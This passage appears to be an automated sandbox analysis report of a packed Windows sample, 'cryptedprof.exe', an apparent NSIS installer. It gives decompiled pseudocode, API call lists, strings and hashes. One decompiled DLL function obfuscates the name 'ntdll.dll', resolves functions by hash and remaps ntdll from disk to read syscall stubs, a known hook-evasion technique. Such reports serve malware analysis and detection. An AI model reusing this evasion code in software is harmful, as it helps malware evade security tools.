                                                                                        • GetFileAttributesA.KERNEL32(Call), ref: 00403B6E
                                                                                        • LoadImageA.USER32 ref: 00403BB7
                                                                                          • Part of subcall function 004061AB: wsprintfA.USER32 ref: 004061B8
                                                                                        • RegisterClassA.USER32 ref: 00403BF4
                                                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403C0C
                                                                                        • CreateWindowExA.USER32 ref: 00403C41
                                                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403C77
                                                                                        • GetClassInfoA.USER32 ref: 00403CA3
                                                                                        • GetClassInfoA.USER32 ref: 00403CB0
                                                                                        • RegisterClassA.USER32 ref: 00403CB9
                                                                                        • DialogBoxParamA.USER32 ref: 00403CD8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$B
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 96%
                                                                                        			E00402EF1(void* __eflags, signed int _a4) {
                                                                                        				long _v8;
                                                                                        				long _v12;
                                                                                        				intOrPtr _v16;
                                                                                        				long _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				signed int _v40;
                                                                                        				char _v300;
                                                                                        				long _t54;
                                                                                        				void* _t57;
                                                                                        				void* _t62;
                                                                                        				intOrPtr _t65;
                                                                                        				void* _t68;
                                                                                        				intOrPtr* _t70;
                                                                                        				long _t82;
                                                                                        				signed int _t89;
                                                                                        				intOrPtr _t92;
                                                                                        				intOrPtr _t100;
                                                                                        				void* _t104;
                                                                                        				intOrPtr _t105;
                                                                                        				long _t106;
                                                                                        				long _t109;
                                                                                        				void* _t110;
                                                                                        
                                                                                        				_v8 = 0;
                                                                                        				_v12 = 0;
                                                                                        				 *0x42f450 = GetTickCount() + 0x3e8;
                                                                                        				GetModuleFileNameA(0, "C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x400);
                                                                                        				_t104 = E00405DE6("C:\\Users\\engineer\\Desktop\\cryptedprof.exe", 0x80000000, 3);
                                                                                        				 *0x40a018 = _t104;
                                                                                        				if(_t104 == 0xffffffff) {
                                                                                        					return "Error launching installer";
                                                                                        				}
                                                                                        				E0040624D("C:\\Users\\engineer\\Desktop", "C:\\Users\\engineer\\Desktop\\cryptedprof.exe");
                                                                                        				E0040624D(0x437000, E00405C2C("C:\\Users\\engineer\\Desktop"));
                                                                                        				_t54 = GetFileSize(_t104, 0);
                                                                                        				 *0x429470 = _t54;
                                                                                        				_t109 = _t54;
                                                                                        				if(_t54 <= 0) {
                                                                                        					L22:
                                                                                        					E00402E52(1);
                                                                                        					if( *0x42f458 == 0) {
                                                                                        						goto L30;
                                                                                        					}
                                                                                        					if(_v12 == 0) {
                                                                                        						L26:
                                                                                        						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                        						_t110 = _t57;
                                                                                        						_t105 = 8;
                                                                                        						 *0x415458 = 0x40d450;
                                                                                        						 *0x415454 = 0x40d450;
                                                                                        						 *0x40b8b0 = _t105;
                                                                                        						 *0x40bdcc = 0;
                                                                                        						 *0x40bdc8 = 0;
                                                                                        						 *0x415450 = 0x415450; // executed
                                                                                        						E00405E15( &_v300, "C:\\Users\\engineer\\AppData\\Local\\Temp\\"); // executed
                                                                                        						_t62 = CreateFileA( &_v300, 0xc0000000, 0, 0, 2, 0x4000100, 0); // executed
                                                                                        						 *0x40a01c = _t62;
                                                                                        						if(_t62 != 0xffffffff) {
                                                                                        							_t65 = E0040343E( *0x42f458 + 0x1c);
                                                                                        							 *0x429474 = _t65;
                                                                                        							 *0x429468 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                        							_t68 = E004031B7(_v16, 0xffffffff, 0, _t110, _v20); // executed
                                                                                        							if(_t68 == _v20) {
                                                                                        								 *0x42f454 = _t110;
                                                                                        								 *0x42f45c =  *_t110;
                                                                                        								if((_v40 & 0x00000001) != 0) {
                                                                                        									 *0x42f460 =  *0x42f460 + 1;
                                                                                        								}
                                                                                        								_t45 = _t110 + 0x44; // 0x44
                                                                                        								_t70 = _t45;
                                                                                        								_t100 = _t105;
                                                                                        								do {
                                                                                        									_t70 = _t70 - _t105;
                                                                                        									 *_t70 =  *_t70 + _t110;
                                                                                        									_t100 = _t100 - 1;
                                                                                        								} while (_t100 != 0);
                                                                                        								 *((intOrPtr*)(_t110 + 0x3c)) =  *0x429464;
                                                                                        								E00405DA1(0x42f480, _t110 + 4, 0x40);
                                                                                        								return 0;
                                                                                        							}
                                                                                        							goto L30;
                                                                                        						}
                                                                                        						return "Error writing temporary file. Make sure your temp folder is valid.";
                                                                                        					}
                                                                                        					E0040343E( *0x429460);
                                                                                        					if(E00403428( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                        						goto L30;
                                                                                        					} else {
                                                                                        						goto L26;
                                                                                        					}
                                                                                        				} else {
                                                                                        					do {
                                                                                        						_t106 = _t109;
                                                                                        						asm("sbb eax, eax");
                                                                                        						_t82 = ( ~( *0x42f458) & 0x00007e00) + 0x200;
                                                                                        						if(_t109 >= _t82) {
                                                                                        							_t106 = _t82;
                                                                                        						}
                                                                                        						if(E00403428(0x421460, _t106) == 0) {
                                                                                        							E00402E52(1);
                                                                                        							L30:
                                                                                        							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                        						}
                                                                                        						if( *0x42f458 != 0) {
                                                                                        							if((_a4 & 0x00000002) == 0) {
                                                                                        								E00402E52(0);
                                                                                        							}
                                                                                        							goto L19;
                                                                                        						}
                                                                                        						E00405DA1( &_v40, 0x421460, 0x1c);
                                                                                        						_t89 = _v40;
                                                                                        						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                        							_a4 = _a4 | _t89;
                                                                                        							 *0x42f500 =  *0x42f500 | _a4 & 0x00000002;
                                                                                        							_t92 = _v16;
                                                                                        							 *0x42f458 =  *0x429460;
                                                                                        							if(_t92 > _t109) {
                                                                                        								goto L30;
                                                                                        							}
                                                                                        							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                        								_v12 = _v12 + 1;
                                                                                        								_t109 = _t92 - 4;
                                                                                        								if(_t106 > _t109) {
                                                                                        									_t106 = _t109;
                                                                                        								}
                                                                                        								goto L19;
                                                                                        							} else {
                                                                                        								goto L22;
                                                                                        							}
                                                                                        						}
                                                                                        						L19:
                                                                                        						if(_t109 <  *0x429470) {
                                                                                        							_v8 = E0040670D(_v8, 0x421460, _t106);
                                                                                        						}
                                                                                        						 *0x429460 =  *0x429460 + _t106;
                                                                                        						_t109 = _t109 - _t106;
                                                                                        					} while (_t109 != 0);
                                                                                        					goto L22;
                                                                                        				}
                                                                                        			}





























                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402F05
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\cryptedprof.exe,00000400), ref: 00402F21
                                                                                          • Part of subcall function 00405DE6: GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00405DEA
                                                                                          • Part of subcall function 00405DE6: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E0C
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\cryptedprof.exe,C:\Users\user\Desktop\cryptedprof.exe,80000000,00000003), ref: 00402F6A
                                                                                        • GlobalAlloc.KERNELBASE(00000040,0040A130), ref: 004030AF
                                                                                        Strings
                                                                                        • soft, xrefs: 00402FE1
                                                                                        • C:\Users\user\Desktop, xrefs: 00402F4C, 00402F51, 00402F57
                                                                                        • C:\Users\user\Desktop\cryptedprof.exe, xrefs: 00402F0B, 00402F1A, 00402F2E, 00402F4B
                                                                                        • Error launching installer, xrefs: 00402F41
                                                                                        • Inst, xrefs: 00402FD8
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00402EF1
                                                                                        • Null, xrefs: 00402FEA
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 0040316A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402EFB, 004030CF
                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 0040311C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\cryptedprof.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 2803837635-4063356020
                                                                                        • Opcode ID: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                        • Instruction ID: e8b4360117e31fb5ea1b260af931ada4a8b54667cc236f60df091846fad1fe42
                                                                                        • Opcode Fuzzy Hash: c7140cee4d51e81b519843824b21cc99042816bf3a65f540c359333e0c5614f7
                                                                                        • Instruction Fuzzy Hash: B471D171A00204ABDB20AF64DD45B9A7BB8EB14719F60803BE505BB2D1D77CAE468B5C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 75%
                                                                                        			E00401759(FILETIME* __ebx, void* __eflags) {
                                                                                        				void* _t33;
                                                                                        				void* _t41;
                                                                                        				void* _t43;
                                                                                        				FILETIME* _t49;
                                                                                        				FILETIME* _t62;
                                                                                        				void* _t64;
                                                                                        				signed int _t70;
                                                                                        				FILETIME* _t71;
                                                                                        				FILETIME* _t75;
                                                                                        				signed int _t77;
                                                                                        				void* _t80;
                                                                                        				CHAR* _t82;
                                                                                        				void* _t85;
                                                                                        
                                                                                        				_t75 = __ebx;
                                                                                        				_t82 = E00402BCE(0x31);
                                                                                        				 *(_t85 - 8) = _t82;
                                                                                        				 *(_t85 + 8) =  *(_t85 - 0x28) & 0x00000007;
                                                                                        				_t33 = E00405C52(_t82);
                                                                                        				_push(_t82);
                                                                                        				if(_t33 == 0) {
                                                                                        					lstrcatA(E00405BE5(E0040624D(0x40a450, "C:\\Users\\engineer\\AppData\\Local\\Temp")), ??);
                                                                                        				} else {
                                                                                        					_push(0x40a450);
                                                                                        					E0040624D();
                                                                                        				}
                                                                                        				E00406528(0x40a450);
                                                                                        				while(1) {
                                                                                        					__eflags =  *(_t85 + 8) - 3;
                                                                                        					if( *(_t85 + 8) >= 3) {
                                                                                        						_t64 = E004065C1(0x40a450);
                                                                                        						_t77 = 0;
                                                                                        						__eflags = _t64 - _t75;
                                                                                        						if(_t64 != _t75) {
                                                                                        							_t71 = _t64 + 0x14;
                                                                                        							__eflags = _t71;
                                                                                        							_t77 = CompareFileTime(_t71, _t85 - 0x1c);
                                                                                        						}
                                                                                        						asm("sbb eax, eax");
                                                                                        						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
                                                                                        						__eflags = _t70;
                                                                                        						 *(_t85 + 8) = _t70;
                                                                                        					}
                                                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                                                        					if( *(_t85 + 8) == _t75) {
                                                                                        						E00405DC1(0x40a450);
                                                                                        					}
                                                                                        					__eflags =  *(_t85 + 8) - 1;
                                                                                        					_t41 = E00405DE6(0x40a450, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
                                                                                        					__eflags = _t41 - 0xffffffff;
                                                                                        					 *(_t85 - 0xc) = _t41;
                                                                                        					if(_t41 != 0xffffffff) {
                                                                                        						break;
                                                                                        					}
                                                                                        					__eflags =  *(_t85 + 8) - _t75;
                                                                                        					if( *(_t85 + 8) != _t75) {
                                                                                        						E00405374(0xffffffe2,  *(_t85 - 8));
                                                                                        						__eflags =  *(_t85 + 8) - 2;
                                                                                        						if(__eflags == 0) {
                                                                                        							 *((intOrPtr*)(_t85 - 4)) = 1;
                                                                                        						}
                                                                                        						L31:
                                                                                        						 *0x42f4e8 =  *0x42f4e8 +  *((intOrPtr*)(_t85 - 4));
                                                                                        						__eflags =  *0x42f4e8;
                                                                                        						goto L32;
                                                                                        					} else {
                                                                                        						E0040624D(0x40ac50, 0x430000);
                                                                                        						E0040624D(0x430000, 0x40a450);
                                                                                        						E004062E0(_t75, 0x40ac50, 0x40a450, "C:\Users\engineer\AppData\Local\Temp\nsl227.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x14)));
                                                                                        						E0040624D(0x430000, 0x40ac50);
                                                                                        						_t62 = E00405969("C:\Users\engineer\AppData\Local\Temp\nsl227.tmp\System.dll",  *(_t85 - 0x28) >> 3) - 4;
                                                                                        						__eflags = _t62;
                                                                                        						if(_t62 == 0) {
                                                                                        							continue;
                                                                                        						} else {
                                                                                        							__eflags = _t62 == 1;
                                                                                        							if(_t62 == 1) {
                                                                                        								 *0x42f4e8 =  &( *0x42f4e8->dwLowDateTime);
                                                                                        								L32:
                                                                                        								_t49 = 0;
                                                                                        								__eflags = 0;
                                                                                        							} else {
                                                                                        								_push(0x40a450);
                                                                                        								_push(0xfffffffa);
                                                                                        								E00405374();
                                                                                        								L29:
                                                                                        								_t49 = 0x7fffffff;
                                                                                        							}
                                                                                        						}
                                                                                        					}
                                                                                        					L33:
                                                                                        					return _t49;
                                                                                        				}
                                                                                        				E00405374(0xffffffea,  *(_t85 - 8));
                                                                                        				 *0x42f514 =  *0x42f514 + 1;
                                                                                        				_t43 = E004031B7(_t77,  *((intOrPtr*)(_t85 - 0x20)),  *(_t85 - 0xc), _t75, _t75); // executed
                                                                                        				 *0x42f514 =  *0x42f514 - 1;
                                                                                        				__eflags =  *(_t85 - 0x1c) - 0xffffffff;
                                                                                        				_t80 = _t43;
                                                                                        				if( *(_t85 - 0x1c) != 0xffffffff) {
                                                                                        					L22:
                                                                                        					SetFileTime( *(_t85 - 0xc), _t85 - 0x1c, _t75, _t85 - 0x1c); // executed
                                                                                        				} else {
                                                                                        					__eflags =  *((intOrPtr*)(_t85 - 0x18)) - 0xffffffff;
                                                                                        					if( *((intOrPtr*)(_t85 - 0x18)) != 0xffffffff) {
                                                                                        						goto L22;
                                                                                        					}
                                                                                        				}
                                                                                        				FindCloseChangeNotification( *(_t85 - 0xc)); // executed
                                                                                        				__eflags = _t80 - _t75;
                                                                                        				if(_t80 >= _t75) {
                                                                                        					goto L31;
                                                                                        				} else {
                                                                                        					__eflags = _t80 - 0xfffffffe;
                                                                                        					if(_t80 != 0xfffffffe) {
                                                                                        						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffee);
                                                                                        					} else {
                                                                                        						E004062E0(_t75, _t80, 0x40a450, 0x40a450, 0xffffffe9);
                                                                                        						lstrcatA(0x40a450,  *(_t85 - 8));
                                                                                        					}
                                                                                        					_push(0x200010);
                                                                                        					_push(0x40a450);
                                                                                        					E00405969();
                                                                                        					goto L29;
                                                                                        				}
                                                                                        				goto L33;
                                                                                        			}

















                                                                                        APIs
                                                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 00401798
                                                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp,00000000,00000000,00000031), ref: 004017C2
                                                                                          • Part of subcall function 0040624D: lstrcpynA.KERNEL32(?,?,00000400,00403558,Setup Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 0040625A
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 004053AD
                                                                                          • Part of subcall function 00405374: lstrlenA.KERNEL32(00402EC9,0042A098,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 004053BD
                                                                                          • Part of subcall function 00405374: lstrcatA.KERNEL32(0042A098,00402EC9,00402EC9,0042A098,00000000,00000000,00000000), ref: 004053D0
                                                                                          • Part of subcall function 00405374: SetWindowTextA.USER32(0042A098,0042A098), ref: 004053E2
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405408
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405422
                                                                                          • Part of subcall function 00405374: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405430
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\nsl227.tmp\System.dll$Call
                                                                                        • API String ID: 1941528284-3933861923
                                                                                        • Opcode ID: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                        • Instruction ID: 5f47ace1ae7a1eefb157477671532b43bdd4633c8b8a9d03c9106597174e7376
                                                                                        • Opcode Fuzzy Hash: 557ef526f42ec28edab53691d762c079f4bd310eaf31ddc110736b3ad8fce03f
                                                                                        • Instruction Fuzzy Hash: 7E418431900515BACF107BB58D45EAF3679DF05368F20827FF422B20E1DA7C9A529A6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 69%
                                                                                        			E6FC23705(intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				void* _v12;
                                                                                        				void* _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				void* _v24;
                                                                                        				signed int _v28;
                                                                                        				intOrPtr _v32;
                                                                                        				signed int _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				signed int _v44;
                                                                                        				signed int _v48;
                                                                                        				intOrPtr _v52;
                                                                                        				intOrPtr _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
                                                                                        				intOrPtr _v72;
                                                                                        				void* _v76;
                                                                                        				intOrPtr _v80;
                                                                                        				signed char _v84;
                                                                                        				long _v88;
                                                                                        				short _v90;
                                                                                        				short _v92;
                                                                                        				short _v94;
                                                                                        				short _v96;
                                                                                        				short _v98;
                                                                                        				short _v100;
                                                                                        				short _v102;
                                                                                        				short _v104;
                                                                                        				short _v106;
                                                                                        				char _v108;
                                                                                        				short _t141;
                                                                                        				short _t142;
                                                                                        				short _t143;
                                                                                        				short _t144;
                                                                                        				short _t145;
                                                                                        				short _t146;
                                                                                        				short _t147;
                                                                                        				short _t148;
                                                                                        				short _t149;
                                                                                        				int _t165;
                                                                                        				intOrPtr _t175;
                                                                                        				signed int _t195;
                                                                                        				signed int _t210;
                                                                                        				signed int _t222;
                                                                                        
                                                                                        				_v24 = _v24 & 0x00000000;
                                                                                        				_v48 = _v48 & 0x00000000;
                                                                                        				_v8 = _v8 & 0x00000000;
                                                                                        				_t141 = 0x6e;
                                                                                        				_v108 = _t141;
                                                                                        				_t142 = 0x74;
                                                                                        				_v106 = _t142;
                                                                                        				_t143 = 0x64;
                                                                                        				_v104 = _t143;
                                                                                        				_t144 = 0x6c;
                                                                                        				_v102 = _t144;
                                                                                        				_t145 = 0x6c;
                                                                                        				_v100 = _t145;
                                                                                        				_t146 = 0x2e;
                                                                                        				_v98 = _t146;
                                                                                        				_t147 = 0x64;
                                                                                        				_v96 = _t147;
                                                                                        				_t148 = 0x6c;
                                                                                        				_v94 = _t148;
                                                                                        				_t149 = 0x6c;
                                                                                        				_v92 = _t149;
                                                                                        				_v90 = 0;
                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                        				_v36 = _v36 & 0x00000000;
                                                                                        				_t23 =  &_v44;
                                                                                        				 *_t23 = _v44 & 0x00000000;
                                                                                        				_t222 =  *_t23;
                                                                                        				_v20 = E6FC24582();
                                                                                        				_v64 = E6FC2462A(_v20, 0x8a111d91);
                                                                                        				_v68 = E6FC2462A(_v20, 0x170c1ca1);
                                                                                        				_v52 = E6FC2462A(_v20, 0xa5f15738);
                                                                                        				_v72 = E6FC2462A(_v20, 0x433a3842);
                                                                                        				_v56 = E6FC2462A(_v20, 0xd6eb2188);
                                                                                        				_v60 = E6FC2462A(_v20, 0x50a26af);
                                                                                        				_v80 = E6FC2462A(_v20, 0x55e38b1f);
                                                                                        				_v44 = 1;
                                                                                        				while(1) {
                                                                                        					_v16 = CreateFileW(E6FC24785(_t222,  &_v108), 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                        					if(_v16 == 0xffffffff) {
                                                                                        						break;
                                                                                        					}
                                                                                        					_v36 = _v68(_v16, 0);
                                                                                        					__eflags = _v36 - 0xffffffff;
                                                                                        					if(_v36 != 0xffffffff) {
                                                                                        						_v12 = VirtualAlloc(0, _v36, 0x3000, 4);
                                                                                        						__eflags = _v12;
                                                                                        						if(_v12 != 0) {
                                                                                        							_t165 = ReadFile(_v16, _v12, _v36,  &_v88, 0);
                                                                                        							__eflags = _t165;
                                                                                        							if(_t165 != 0) {
                                                                                        								_v76 = _v12;
                                                                                        								_v32 = _v12 +  *((intOrPtr*)(_v76 + 0x3c));
                                                                                        								_t213 = _v32;
                                                                                        								_v40 = _v32 + ( *(_v32 + 0x14) & 0x0000ffff) + 0x18;
                                                                                        								_v24 = VirtualAlloc(0,  *(_v32 + 0x50), 0x3000, 4);
                                                                                        								__eflags = _v24;
                                                                                        								if(_v24 != 0) {
                                                                                        									E6FC2459A(_t213, _v24, _v12,  *((intOrPtr*)(_v32 + 0x54)));
                                                                                        									_v28 = _v28 & 0x00000000;
                                                                                        									while(1) {
                                                                                        										_t175 = _v32;
                                                                                        										__eflags = _v28 - ( *(_t175 + 6) & 0x0000ffff);
                                                                                        										if(_v28 >= ( *(_t175 + 6) & 0x0000ffff)) {
                                                                                        											break;
                                                                                        										}
                                                                                        										E6FC2459A(_v40, _v24 +  *((intOrPtr*)(_v40 + 0xc + _v28 * 0x28)), _v12 +  *((intOrPtr*)(_v40 + 0x14 + _v28 * 0x28)),  *((intOrPtr*)(_v40 + 0x10 + _v28 * 0x28)));
                                                                                        										_t210 = _v28 + 1;
                                                                                        										__eflags = _t210;
                                                                                        										_v28 = _t210;
                                                                                        									}
                                                                                        									_v48 = E6FC2462A(_v24, _a4);
                                                                                        									__eflags = _v48;
                                                                                        									if(_v48 != 0) {
                                                                                        										__eflags = _v16;
                                                                                        										if(_v16 != 0) {
                                                                                        											FindCloseChangeNotification(_v16);
                                                                                        										}
                                                                                        										__eflags = _v12;
                                                                                        										if(_v12 != 0) {
                                                                                        											VirtualFree(_v12, 0, 0x8000);
                                                                                        										}
                                                                                        										_v44 = _v44 & 0x00000000;
                                                                                        										__eflags = 0;
                                                                                        										if(0 != 0) {
                                                                                        											continue;
                                                                                        										}
                                                                                        									} else {
                                                                                        									}
                                                                                        								} else {
                                                                                        								}
                                                                                        							} else {
                                                                                        							}
                                                                                        						} else {
                                                                                        						}
                                                                                        					} else {
                                                                                        					}
                                                                                        					L22:
                                                                                        					if(_v44 != 0) {
                                                                                        						if(_v16 != 0) {
                                                                                        							_v56(_v16);
                                                                                        						}
                                                                                        						_v80(0);
                                                                                        					}
                                                                                        					_v8 = _v48;
                                                                                        					while(1 != 0) {
                                                                                        						if(( *_v8 & 0x000000ff) != 0xb8) {
                                                                                        							__eflags = ( *_v8 & 0x000000ff) - 0xe9;
                                                                                        							if(( *_v8 & 0x000000ff) != 0xe9) {
                                                                                        								__eflags = ( *_v8 & 0x000000ff) - 0xea;
                                                                                        								if(( *_v8 & 0x000000ff) != 0xea) {
                                                                                        									_t195 = _v8 + 1;
                                                                                        									__eflags = _t195;
                                                                                        									_v8 = _t195;
                                                                                        								} else {
                                                                                        									_v8 =  *(_v8 + 1);
                                                                                        								}
                                                                                        							} else {
                                                                                        								_t125 =  *(_v8 + 1) + 5; // 0x5
                                                                                        								_v8 = _v8 + _t125;
                                                                                        							}
                                                                                        							continue;
                                                                                        						} else {
                                                                                        						}
                                                                                        						break;
                                                                                        					}
                                                                                        					_v8 = _v8 + 1;
                                                                                        					_v84 =  *_v8;
                                                                                        					if(_v24 != 0) {
                                                                                        						VirtualFree(_v24, 0, 0x8000);
                                                                                        					}
                                                                                        					return _v84;
                                                                                        				}
                                                                                        				goto L22;
                                                                                        			}

                                                                                        APIs
                                                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,55E38B1F,?,050A26AF,?,D6EB2188,?,433A3842), ref: 6FC23807
                                                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 6FC239D4
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CreateFileFreeVirtual
                                                                                        • String ID:
                                                                                        • API String ID: 204039940-0
                                                                                        • Opcode ID: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                        • Instruction ID: 36e26a9abcccf1734293fa790402c7e382aacf71699086e3c95b489a232561ee
                                                                                        • Opcode Fuzzy Hash: 1a27eacef18cec4e83dd66d6f105d4ce73f2ffecc6ce0885b3943496d180ad0d
                                                                                        • Instruction Fuzzy Hash: E6A1EF70E04209EFDB00DFA4D986BEDBBF1FF09716F20855AE610BA2A0E3755A44DB14
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E0040583A(CHAR* _a4) {
                                                                                        				struct _SECURITY_ATTRIBUTES _v16;
                                                                                        				struct _SECURITY_DESCRIPTOR _v36;
                                                                                        				int _t22;
                                                                                        				long _t23;
                                                                                        
                                                                                        				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
                                                                                        				_v36.Owner = 0x408384;
                                                                                        				_v36.Group = 0x408384;
                                                                                        				_v36.Sacl = _v36.Sacl & 0x00000000;
                                                                                        				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
                                                                                        				_v16.lpSecurityDescriptor =  &_v36;
                                                                                        				_v36.Revision = 1;
                                                                                        				_v36.Control = 4;
